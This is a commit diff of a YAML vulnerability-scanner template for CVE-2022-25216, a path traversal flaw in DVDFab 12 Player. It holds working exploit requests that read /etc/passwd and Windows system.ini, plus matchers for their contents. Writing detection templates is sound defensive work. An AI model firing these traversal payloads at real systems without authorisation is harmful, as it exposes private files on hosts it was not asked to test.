Update and rename CVE-2022-25216.yaml to cves/2022/CVE-2022-25216.yaml

cves/2022/CVE-2022-25216.yaml

@@ -6,30 +6,32 @@ info:
   severity: high
   description: An absolute path traversal vulnerability allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access
   reference:
-    - https://www.cvedetails.com/cve/CVE-2022-25216
     - https://www.tenable.com/security/research/tra-2022-07
+    - https://www.cvedetails.com/cve/CVE-2022-25216
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2022-25216
     cwe-id: CWE-22
   tags: cve,cve2022,dvdFab,lfi
-  
+
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd"
       - "{{BaseURL}}/interlib/report/ShowImage?localPath=C%3a%2fwindows%2fsystem.ini"
 
-    matchers-condition: and
+    stop-at-first-match: true
+    matchers-condition: or
     matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
 
       - type: regex
         regex:
-          - "root:.*:0:0:"
+          - "root:[x*]:0:0:"
-          - "for 16-bit app support"
-        condition: or
-
-      - type: status
-        status:
-          - 200